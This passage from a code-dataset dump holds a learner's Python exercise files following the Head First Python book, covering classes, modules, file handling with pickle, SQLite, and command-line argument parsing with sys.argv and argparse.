code is designed to be shared among all of the object instances:\nthe methods are shared, the attributes are NOT. The self argument helps identify which object instance's data to work on.\n\"\"\"\n\n# Every method's first argument is self\n\"\"\"\nclass Athlete:\n\tdef __init__(self, value=0):\n\t\tself.thing = value\n\tdef how_big(self):\n\t\treturn(len(self.thing))\n\nd = Athlete(\"Holy Grail.\")\nprint(d.how_big())\n\na = Athlete(\"\")\nprint(a.how_big())\n\"\"\"\n\n\"\"\"\nclass Athlete:\n\tdef __init__(self, a_name, a_dob=None, a_times=[]):\n\t\tself.name = a_name\n\t\tself.dob = a_dob\n\t\tself.times = a_times\n\nsarah = Athlete('Sarah Sweeney', '2002-6-17', ['2:58', '2.58', '1.56'])\njames = Athlete('James Jones')\n\nprint(type(sarah))\nprint(type(james))\n\nprint(sarah)\nprint(james)\n\nprint(sarah.name)\nprint(james.name)\nprint(sarah.dob)\nprint(james.dob)\nprint(sarah.times)\nprint(james.times)\n\"\"\"\n\n# improve get_coach_data function\n\n\"\"\"\nclass Athlete:\n\tdef __init__(self, a_name, a_dob=None, a_times=[]):\n\t\tself.name = a_name\n\t\tself.dob = a_dob\n\t\tself.times = a_times\n\n\tdef top3(self):\n\t\treturn(sorted(set([sanitize(t) for t in self.times]))[0:3])\n\n# add Athlete class def\n\tdef add_time(self, time_value):\n\t\tself.times.append(time_value)\n\n\tdef add_times(self, list_of_times):\n\t\tself.times.extend(list_of_times)\n\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\ttempl = data.strip().split(',')\n\t\treturn Athlete(templ.pop(0), templ.pop(0), templ)\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\nfor each_item in sample:\n\tarr = get_coach_data(each_item)\n\tprint(arr.name + \"'s fastest times are: \" + str(arr.top3()))\n\"\"\"\n\n# create a new object instance for Vera.\n\n\"\"\"\nvera = Athlete('Vera Vi')\nvera.add_time('1.31')\nprint(vera.top3())\nvera.add_times(['2.22', \"1-21\", '2:22'])\nprint(vera.top3())\n\"\"\"\n\n\n# Inherit 
from Python's built-in list\n\n\"\"\"\nclass NamedList(list):\n\tdef __init__(self, a_name):\n\t\tlist.__init__([])\n\t\tself.name = a_name\n\njohnny = NamedList(\"John Paul Jones\")\nprint(type(johnny))\nprint(dir(johnny))\n\njohnny.append(\"Bass Player\")\nprint(johnny)\njohnny.extend(['Composer', \"Arranger\", \"Musician\"])\nprint(johnny)\n\nprint(johnny.name)\n\nfor attr in johnny:\n\tprint(johnny.name + \" is a \" + attr + \".\")\n\"\"\"\n\n# improve Athlete class\n\nclass AthleteList(list):\n\tdef __init__(self, a_name, a_dob=None, a_times=[]):\n\t\tlist.__init__([])\n\t\tself.name = a_name\n\t\tself.dob = a_dob\n\t\tself.extend(a_times)\n\n\tdef top3(self):\n\t\treturn(sorted(set([sanitize(t) for t in self]))[0:3])\n\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\ttempl = data.strip().split(',')\n\t\treturn(AthleteList(templ.pop(0), templ.pop(0), templ))\t# Athlete -> AthleteList change\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\nvera = AthleteList('Vera Vi')\nvera.append('1.31')\nprint(vera.top3())\nvera.extend(['2.22', \"1-21\", '2:22'])\nprint(vera.top3())\n\nfor each_item in sample:\n\tarr = get_coach_data(each_item)\n\tprint(arr.name + \"'s fastest times are: \" + str(arr.top3()))\n\n# 'self' - a method argument that always refers to the current object instance.\n\n"
},
{
"alpha_fraction": 0.7521079182624817,
"alphanum_fraction": 0.7588533163070679,
"avg_line_length": 33.882354736328125,
"blob_id": "ba3a75fbd92a8651687982dc588c6f4226399601",
"content_id": "0b53a7703273dd157a5743514f849d20a775e9c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 593,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 17,
"path": "/08-devices/mobile.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Small devices\n\n# The world is getting samller\n# there's more than just desktop computers out there.\n\n# A quick search of the Web uncovers a pleasent surprise: Python runs on Android.\n# At least a version of Python runs on Android. A project called Scripting Layer for Android(SL4A) provides technology to let you\n# run Python on any Android device. But there's a catch.\n\n# Yes. SL4A ships with Python 2, not 3.\n\n# Set up your deveopment environment\n\n# Download the Software Development Kit (SDK)\n\n# Go home computer, Do it when you complete the download the SDK.\n# Not on linux. on windows.\n"
},
{
"alpha_fraction": 0.6014670133590698,
"alphanum_fraction": 0.621026873588562,
"avg_line_length": 28.926828384399414,
"blob_id": "d35d332c74e28f3f09674d6705f273dc105253c4",
"content_id": "b4d774c69e576edf0d266a424d68e4b8f5cef4a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1227,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 41,
"path": "/tutorial/basic-form-of-driver.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "import sys\n\nprint('Program started!')\nprint('Number of arguments: ', len(sys.argv), ' arguments.')\nprint('Argument List: ', str(sys.argv))\nprint('')\n\nif sys.argv[1] == 'bfs':\n\tprint(\"Breadth-First Search Algorithm working here...\")\n\tlist = sys.argv[2].split(',')\n\tprint(\"This is comma-separated list of integers : \" + str(list))\n\tprint(\"example: \")\n\tprint(\"list[0] : \" + list[0])\n\tprint(\"list[1] : \" + list[1])\n\nelif sys.argv[1] == 'dfs':\n\tprint(\"Depth-First Search Algorithm working here...\")\n\tlist = sys.argv[2].split(',')\n\tprint(\"This is comma-separated list of integers : \" + str(list))\n\tprint(\"example: \")\n\tprint(\"list[0] : \" + list[0])\n\tprint(\"list[1] : \" + list[1])\n\nelif sys.argv[1] == 'ast':\n\tprint(\"A-Star Search Algorithm working here...\")\n\tlist = sys.argv[2].split(',')\n\tprint(\"This is comma-separated list of integers : \" + str(list))\n\tprint(\"example: \")\n\tprint(\"list[0] : \" + list[0])\n\tprint(\"list[1] : \" + list[1])\n\nelif sys.argv[1] == 'ida':\n\tprint(\"IDA-Star Search Algorithm working here...\")\n\tlist = sys.argv[2].split(',')\n\tprint(\"This is comma-separated list of integers : \" + str(list))\n\tprint(\"example: \")\n\tprint(\"list[0] : \" + list[0])\n\tprint(\"list[1] : \" + list[1])\n\nprint('')\nprint(\"Program Finished!\")\n"
},
{
"alpha_fraction": 0.7065480947494507,
"alphanum_fraction": 0.7130153775215149,
"avg_line_length": 26.080291748046875,
"blob_id": "77a9026993ca566974a4d400f8b47c1a09682cd5",
"content_id": "d8be2b2f96ec28500b566321fc370de83fde9317",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3711,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 137,
"path": "/02-functions/functions.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Modules of functions\n\n# Modules let you organize your code for optimal sharing.\n# The distribution utilities let you share your modules with the world.\n\n# Modulea are everywhere.\n# A module is simply z text file that contains Python code.\n\n\"\"\" (triple quote) for multiple-line comments.\nThis is the standard way to include a multiple-line comment in your code.\n\"\"\"\n\n\n# Prepare your distribution\n\"\"\"\n1. begin by creating a folder for your module.\n2. create a file called \"setup.py\" in your new folder.\n\"\"\"\n\n# Build your distribution\n\"\"\"\n3. build a distribution file.\n\topen a terminal window within your nester folder and type a single command: $ python3 setup.py sdist\n4. install your distribution into your lacal copy of Python.\n\ttype this command: $ sudo python3 setup.py install\n5. then, your distribution is ready.\n\"\"\"\n\n# A quick review of your distribution\n\"\"\"\nAfter setup, These files and folders are all created for you by the distribution utilities.\n\"\"\"\n\n# Import a module to use it\n\"\"\"\nNow that your module is built, packaged as a distribution, and installed, let's see what's involved in using it.\nTo use a module, simply import it into your programs or import it into the IDLE shell:\n\timport nester\nThe import statement tells Python to include the nester.py module in your program.\n\nimport nester\ncast = ['Palin', 'Cleese','Idle', 'Jones', 'Gilliam', 'Chapman']\nprint_lol(cast)\n\"\"\"\n\n# But it didn't Work!\n\n# Python's modules implement namespaces\n\"\"\"\nAll code in Python is associated with a namespace.\nSo, instead of invoking the function as print_lol(cast) you need to qualify the name as nester.print_lol(cast).\n\nnester.print_lol(cast)\n\"\"\"\n\n# Register with the PyPI website\n# Upload your code to PyPI\n# Welcome to the PyPI community\n# With success comes responsibility\n\n# Before your write new code, think BIFs.\n\n# range() : Returns an iterator that generates numbers in a specified range on demand and as needed.\n\nimport pdb\n\nfor num in range(4):\n\tprint(num)\n\nmovies = [\"The Holy Grail\", 1975, \"Terry Jones & Terry Gilliam\", 91,\n\t\t\t\t\t\t[\"Graham Chapman\", [\"Michael Palin\", \"John Cleese\", \"Terry Gilliam\", \"Eric Idle\", \"Terry Jones\"]]]\nprint(movies)\n\n#pdb.set_trace()\n\"\"\"\ndef print_lol(the_list, level):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item, level+1)\n\t\telse:\n\t\t\tfor tab_stop in range(level):\n\t\t\t\tprint(\"\\t\", end='')\n\t\t\tprint(each_item)\n\nprint_lol(movies, 0)\n\"\"\"\n\n# trace your code\n# Python Debugger - pdb\n# import pdb\n# pdb.set_trace() : this point is when trace is started.\n# n : step next (executed current line)\n# s : step in (move inside of current line of function)\n# run : if next set_trace() doesn't exist, finished debugging.\n\n# This url is pdb doc.\n# https://docs.python.org/3/library/pdb.html\n\n\n# Use optional arguments\n\n\"\"\"\nTo turn a required argument to a function into an optional argument, provide the argument with a default value.\nWhen no argument value is provided, the default value is used.\nWhen an argument value is provided, it is used instead of the default.\n\ndef print_lol(the_list, level=0):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item, level+1)\n\t\telse:\n\t\t\tfor tab_stop in range(level):\n\t\t\t\tprint(\"\\t\", end='')\n\t\t\tprint(each_item)\n\nprint_lol(movies, 0)\nprint_lol(movies)\nprint_lol(movies, 
5)\n\"\"\"\n\n\n# But, your API is still not right\n# Amend your module one last time to add a third argument to your function.\n\ndef print_lol(the_list, indent=False, level=0):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item, indent, level+1)\n\t\telse:\n\t\t\tif indent:\n\t\t\t\tfor tab_stop in range(level):\n\t\t\t\t\tprint(\"\\t\", end='')\n\t\t\tprint(each_item)\n\nprint_lol(movies)\nprint_lol(movies, True)\nprint_lol(movies, True, 5)\n\n"
},
{
"alpha_fraction": 0.7364953756332397,
"alphanum_fraction": 0.7457180619239807,
"avg_line_length": 20.628570556640625,
"blob_id": "d1fba1ac3bcb07b4d246e905f7cd6215d18fb55c",
"content_id": "94ae1d0ca5f616fcee1928e773fc1a41ae6821dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 759,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 35,
"path": "/09-handle/database.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Database management system\n\n# Python includes SQLite\n\"\"\"\nThe python Database API provides a standard mechanism for programming a wide variery of database management systems,\nincluding SQLite.\n\t1. Connect\n\t2. Create\n\t3. Interact\n\t4. Commit & Rollback\n\t5. Close\n\"\"\"\n\n# Database API as Python code\n\"\"\"\nimport sqlite3\nconnection = sqlite3.connect('test.sqlite')\ncursor = connection.cursor()\ncursor.execute(\"\"\"SELECT DATE('NOW')\"\"\")\nconnection.commit()\nconnection.close()\n\"\"\"\n\n# Define your database schema\n\"\"\"\ncreate table athletes(\n\tid integer primary key autoincrement unique not null,\n\tname text not null,\n\tdob date not null)\n\ncreate table timing_data(\n\tathlete_id integer not null,\n\tvalue text not null,\n\tforeign key (athlete_id) references athletes)\n\"\"\"\n\n\n"
},
{
"alpha_fraction": 0.7630718946456909,
"alphanum_fraction": 0.766339898109436,
"avg_line_length": 49.95833206176758,
"blob_id": "f094d75c83bf19878503e85bacd5406125b5de15",
"content_id": "c393591f6d43aafbae06237f5d918cc78e42bf34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1236,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 24,
"path": "/tutorial/data-structure.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Python Data Structure\n\n# What's the differences between Tuples and Lists?\n\"\"\"\nTuples are fixed size in nature whereas lists are dynamic.\nIn other words, a tuple is immutable whereas a list is mutable.\n\t1. You can't add elements to a tuple. Tuples have no append or extend method.\n\t2. You can't remove elements from a tuple. Tuples have no remove or pop method.\n\t3. You can find elements in a tuple, since this doesn’t change the tuple.\n\t4. You can also use the in operator to check if an element exists in the tuple.\n\"\"\"\n\n# So what are tuples good for?\n\"\"\"\nTuples are faster than lists.\nIf you’re defining a constant set of values and all you’re ever going to do with it is iterate through it, use a tuple instead of a list.\n\nIt makes your code safer if you “write-protect” data that doesn’t need to be changed.\nUsing a tuple instead of a list is like having an implied assert statement that shows this data is constant,\nand that special thought (and a specific function) is required to override that.\n\nSome tuples can be used as dictionary keys (specifically, tuples that contain immutable values like strings, numbers, and other tuples).\nLists can never be used as dictionary keys, because lists are not immutable.\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.6712920665740967,
"alphanum_fraction": 0.6724295020103455,
"avg_line_length": 21.538461685180664,
"blob_id": "ece41bfa77185d0ab8576791b82907a9b9c3a6f0",
"content_id": "dcd706a1f54f61303287a0448fd122f3aa8a798e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4396,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 195,
"path": "/04-files/files.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Saving data to files\n\n\"\"\"\nman = []\nother = []\n\ntry:\n\tdata = open('sketch.txt')\n\tfor each_line in data:\n\t\ttry:\n\t\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\t\tline_spoken = line_spoken.strip()\n\t\t\tif role == 'Man':\n\t\t\t\tman.append(line_spoken)\n\t\t\telif role == 'Other Man':\n\t\t\t\tother.append(line_spoken)\n\t\texcept ValueError:\n\t\t\tpass\n\tdata.close()\nexcept IOError:\n\tprint('The datafile is missing!')\n\nprint(man)\nprint(other)\n\"\"\"\n\n# Open your file in write mode\n\nout = open(\"data.out\", \"w\")\nprint(\"Norwegian Blues stun easily.\", file=out)\nout.close()\n\nman = []\nother = []\n\ntry:\n\tdata = open('sketch.txt')\n\tfor each_line in data:\n\t\ttry:\n\t\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\t\tline_spoken = line_spoken.strip()\n\t\t\tif role == 'Man':\n\t\t\t\tman.append(line_spoken)\n\t\t\telif role == 'Other Man':\n\t\t\t\tother.append(line_spoken)\n\t\texcept ValueError:\n\t\t\tpass\n\tdata.close()\nexcept IOError:\n\tprint('The datafile is missing!')\n\n\"\"\"\ntry:\n\tman_data = open('man_data.txt', 'w')\n\tother_data = open('other_data.txt', 'w')\n\n\tprint(man, file=man_data)\n\tprint(other, file=other_data)\n\t\n\t# If Crash here!\n\t# blow two lines of code DON'T get to run.\t\n\tman_data.close()\n\tother_data.close()\n\nexcept IOError:\n\tprint('File Error!')\n\"\"\"\n\n# Files are left open after an exception!\n\n# Extend try with finally\n# when you have a situation where code must always run no matter what errors occurs,\n# add that code to your try statement's finally suite:\n\n\"\"\"\ntry:\n\tman_data = open('man_data.txt', 'w')\n\tother_data = open('other_data.txt', 'w')\n\n\tprint(man, file=man_data)\n\tprint(other, file=other_data)\n\nexcept IOError:\n\tprint('File Error!')\n\nfinally:\n\tif 'man_file' in locals():\n\t\tman_data.close()\n\tif 'other_file' in locals():\n\t\tother_data.close()\n\"\"\"\n\n\n# Knowing the type of error is not enough\n\n\"\"\"\ntry:\n\tdata = open('missing.txt')\n\tprint(data.readline(), end='')\nexcept IOError as err:\n\tprint('File error: ' + str(err))\nfinally:\n\tif 'data' in locals():\n\t\tdata.close()\n\"\"\"\n\n\n# Use with to work with files\n\ntry:\n\twith open('its.txt', \"w\") as data:\n\t\tprint(\"It's...\", file=data)\nexcept IOError as err:\n\tprint('File error: ' + str(err))\n\n# The with statement takes advantage of a Python technology called the context management protocol.\n\ntry:\n\twith open('man_data.txt', 'w') as man_data:\n\t\tprint(man, file=man_data)\n\t\n\twith open('other_data.txt', 'w') as other_data:\n\t\tprint(other, file=other_data)\n\nexcept IOError as err:\n\tprint('File Error: ' + str(err))\n\n\n# Defualt formats are unsuitable for files\n\n\"\"\"\nwith open('man_data.txt') as mdf:\n\tprint(mdf.readline())\n\"\"\"\n# no need to close your file, because 'with' does that for you.\n\n\n# Why not modify print_lol()?\n\nval = [\"ansxodbs\", \"rlawltn\", [\"mom\", \"dad\", [\"you\", \"and\", \"i\"]]]\n\nimport sys\ndef print_lol(the_list, indent=False, level=0, fh=sys.stdout):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item, indent, level+1, fh)\n\t\telse:\n\t\t\tif indent:\n\t\t\t\tfor tab_stop in range(level):\n\t\t\t\t\tprint(\"\\t\", end='', file=fh)\n\t\t\tprint(each_item, file=fh)\n\n#print_lol(val, True, 0)\n\n\n# Pickle your data\n# Python ships with a standard library called pickle, which can save and load almost any Python data object, including lists.\n\n# Save with dump and 
restore with load\n\"\"\"\nusing pickle is straightforward: import the required module, then use dump() to save your data and, some time later,\nload() to restore it. The only requirement when working with pickled files is that they have to be opened in binary access mode:\n\"\"\"\n\nimport pickle\n\ntry:\n\twith open('man_data.txt', 'wb') as man_file:\n\t\tpickle.dump(man, man_file)\n\twith open('other_data.txt', 'wb') as other_file:\n\t\tpickle.dump(other, other_file)\nexcept IOError as err:\n\tprint('File error: ' + str(err))\nexcept pickle.PickleError as perr:\n\tprint('Pickling error: ' + str(perr))\n\nnew_man = []\nnew_other = []\n\ntry:\n\twith open('man_data.txt', 'rb') as man_file:\n\t\tnew_man = pickle.load(man_file)\n\twith open('other_data.txt', 'rb') as other_file:\n\t\tnew_other = pickle.load(other_file)\nexcept IOError as err:\n\tprint('File error: ' + str(err))\nexcept pickle.PickleError as perr:\n\tprint('Pickling error: ' + str(perr))\n\n#print_lol(new_man)\n#print_lol(new_other)\n\n# pickle really shines when you load some previously pickled data into another program.\n# And, of course, there's nothing to stop you from using pickle with nester.\n# After all, each module is designed to serve different purposes.\n\n"
},
{
"alpha_fraction": 0.7283950448036194,
"alphanum_fraction": 0.7283950448036194,
"avg_line_length": 25.66666603088379,
"blob_id": "64d9b257a27a4c396bef1b3ae7e66d883db2abae",
"content_id": "8a01393465d59033749ad560ef61ff52b79eb524",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 3,
"path": "/README.md",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Python\n\nLearn with [Head First Python](http://python.itcarlow.ie/index.html). \n"
},
{
"alpha_fraction": 0.7119463682174683,
"alphanum_fraction": 0.7155731320381165,
"avg_line_length": 37.388187408447266,
"blob_id": "2a5377a17d2859a6a55781eca71a7d5507e2932b",
"content_id": "51d1db0040f31a20f296d2a9384b191b52a81ae9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9127,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 237,
"path": "/tutorial/argparse_test.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "import argparse\n\n\"\"\" The basics\nparser = argparse.ArgumentParser()\nparser.parse_args()\n\"\"\"\n# The --help option, which can also be shortened to -h, is the only option we get for free.\n\n\"\"\" Introducing Positional arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"echo\") \nargs = parser.parse_args()\nprint(args.echo)\n\"\"\"\n# add_argument() method, which is what we use to specify which command-line options the program is willing to accept.\n# The parse_args() method actually returns some data from the options specified, in this case, echo.\n# The variable is some form of ‘magic’ that argparse performs for free (i.e. no need to specify which variable that value is stored in).\n# You will also notice that its name matches the string argument given to the method, echo.\n\n\"\"\" make it a bit more useful\nparser = argparse.ArgumentParser()\nparser.add_argument(\"echo\", help=\"echo the string you use here\")\nargs = parser.parse_args()\nprint(args.echo)\n\"\"\"\n\n\"\"\" doing something even more useful\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", help=\"display a square of a given number\")\nargs = parser.parse_args()\nprint(args.square**2)\n\"\"\"\n# It didn't go so well.\n# That's because argparse treats the options we give it as strings, unless we tell it otherwise.\n# So, let's tell argparse to treat that input as an integer.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", help=\"display a square of a given number\", type=int)\nargs = parser.parse_args()\nprint(args.square**2)\n\"\"\"\n\n\"\"\" Introducing Optional Arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--verbosity\", help=\"increase output verbosity\")\nargs = parser.parse_args()\nif args.verbosity:\n\tprint(\"Verbosity turned on\")\n\"\"\"\n# To show that the option is actually optional, there is no error when running the program without it.\n# Note that by default, if an optional argument isn’t used, the relevant variable, in this case args.verbosity, is given None as a value,\n# which is the reason it fails the truth test of the if statement.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--verbose\", help=\"increase output verbosity\", action=\"store_true\")\nargs = parser.parse_args()\nif args.verbose:\n\tprint(\"Verbosity turned on\")\n\"\"\"\n# The option is now more of a flag than something that requires a value.\n# We even changed the name of the option to match that idea.\n# Note that we now specify a new keyword, action, and give it the value \"store_true\".\n# This means that, if the option is specified, assign the value True to args.verbose. 
Not specifying it implies False.\n\n\"\"\" Short options\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"store_true\")\nargs = parser.parse_args()\nif args.verbose:\n\tprint(\"Verbosity turned on\")\n\"\"\"\n\n\"\"\" Combining Positional ans Optional arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"store_true\")\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbose:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Note that the order does not matter.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", type=int)\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbose == 2:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelif args.verbose == 1:\n\tprint(\"{}^2 = {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Let's fix it by restricting the values the --verbosity option can accept.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", type=int, choices=[0,1,2])\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbose == 2:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelif args.verbose == 1:\n\tprint(\"{}^2 = {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# let’s use a different approach of playing with verbosity, which is pretty common.\n# It also matches the way the CPython executable handles its own verbosity argument.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"count\")\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbose == 2:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelif args.verbose == 1:\n\tprint(\"{}^2 = {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Now here’s a demonstration of what the “count” action gives. You’ve probably seen this sort of usage before.\n# And if you don’t specify the -v flag, that flag is considered to have None value.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"count\")\nargs = parser.parse_args()\nanswer = args.square**2\n# bug fix: replace == with >=\nif args.verbose >= 2:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelif args.verbose >= 1:\n\tprint(\"{}^2 = {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Third output not so good. 
add defualt keyword.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", type=int, help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"count\", default=0)\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbose >= 2:\n\tprint(\"The square of {} equals {}\".format(args.square, answer))\nelif args.verbose >= 1:\n\tprint(\"{}^2 = {}\".format(args.square, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Remember that by default, if an optional argument isn't specified, it gets the None value, and that cannot be compared to an int value.\n# (hence the TypeError exception.)\n\n\"\"\" Getting a little more advanced\nparser = argparse.ArgumentParser()\nparser.add_argument(\"x\", type=int, help=\"the base\")\nparser.add_argument(\"y\", type=int, help=\"the exponent\")\nparser.add_argument(\"-v\", \"--verbose\", action=\"count\", default=0)\nargs = parser.parse_args()\nanswer = args.x**args.y\nif args.verbose >= 2:\n\tprint(\"{} to the power {} equals {}\".format(args.x, args.y, answer))\nelif args.verbose >= 1:\n\tprint(\"{}^{} = {}\".format(args.x, args.y, answer))\nelse:\n\tprint(answer)\n\"\"\"\n# Notice that so far we’ve been using verbosity level to change the text that gets displayed.\n# The following example instead uses verbosity level to display more text instead.\n\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument(\"x\", type=int, help=\"the base\")\nparser.add_argument(\"y\", type=int, help=\"the exponent\")\nparser.add_argument(\"-v\", \"--verbose\", action=\"count\", default=0)\nargs = parser.parse_args()\nanswer = args.x**args.y\nif args.verbose >= 2:\n\tprint(\"Running '{}\".format(__file__))\nif args.verbose >= 1:\n\tprint(\"{}^{} == \".format(args.x, args.y), end=\"\")\nprint(answer)\n\"\"\"\n\n# So far, we have been working with two methods of an argparse.ArgumentParser instance.\n# Let’s introduce a third one, add_mutually_exclusive_group(). 
It allows for us to specify options that conflict with each other.\n# Let’s also change the rest of the program so that the new functionality makes more sense:\n# we’ll introduce the --quiet option, which will be the opposite of the --verbose one:\n\"\"\" Conflicting options\nparser = argparse.ArgumentParser()\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\ngroup.add_argument(\"-q\", \"--quiet\", action=\"store_true\")\nparser.add_argument(\"x\", type=int, help=\"the base\")\nparser.add_argument(\"y\", type=int, help=\"the exponent\")\nargs = parser.parse_args()\nanswer = args.x**args.y\nif args.quiet:\n\tprint(answer)\nelif args.verbose:\n\tprint(\"{} to the power {} equals {}\".format(args.x, args.y, answer))\nelse:\n\tprint(\"{}^{} == {}\".format(args.x, args.y, answer))\n\"\"\"\n# Before we conclude, you probably want to tell your users the main purpose of your program, just in case they don’t know.\n\nparser = argparse.ArgumentParser(description=\"Calculate X to the power of Y\")\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\ngroup.add_argument(\"-q\", \"--quiet\", action=\"store_true\")\nparser.add_argument(\"x\", type=int, help=\"the base\")\nparser.add_argument(\"y\", type=int, help=\"the exponent\")\nargs = parser.parse_args()\nanswer = args.x**args.y\nif args.quiet:\n\tprint(answer)\nelif args.verbose:\n\tprint(\"{} to the power {} equals {}\".format(args.x, args.y, answer))\nelse:\n\tprint(\"{}^{} == {}\".format(args.x, args.y, answer))\n\n# Conclusion\n# The argparse module offers a lot more than shown here.\n# its docs are quite detailed and thorough, and full of examples.\n\n"
},
{
"alpha_fraction": 0.6684881448745728,
"alphanum_fraction": 0.6766848564147949,
"avg_line_length": 42.880001068115234,
"blob_id": "e543238148ce49a7e05d41947714bc6c557afed6",
"content_id": "c90c7bf5806df34c5eb5bae27f38aa3e275bb3a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1098,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 25,
"path": "/tutorial/command-line-argument.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "\n# Python provides a getopt module that helps you parse command-line options and arguments.\n# $ python test.py arg1 arg2 arg3\n\n# The Python sys module provides access to any command-line arguments via the sys.argv. This serves two purposes:\n# \t\t1. sys.argv is the list of command-line arguments.\n#\t\t\t2. len(sys.argv) is the number of command-line arguments.\n\nimport sys\n\nprint('Number of arguments: ', len(sys.argv), ' arguments.')\nprint('Argument List: ', str(sys.argv))\n\n# type into shell command like this:\n# $ python3 command-line-argument.py arg1 arg2 arg3\n\n# Note: As mentioned above, first argument is always script name and it is also being counted in number of arguments.\n\n\n# -------------------------------------------------------------------------------------------------------------------\n\n# These arguments are stored in the sys module's argv attribute as a list.\n# The getopt module processes sys.argv using the conventions of the Unix getopt() function.\n# More powerful and flexible command line processing is provided by the argparse module.\n\n# create getopt.py, argparse.py files.\n"
},
{
"alpha_fraction": 0.7591164112091064,
"alphanum_fraction": 0.763323962688446,
"avg_line_length": 40.92647171020508,
"blob_id": "13dd919b69298a9e88aef52fe15a5f7187a3190d",
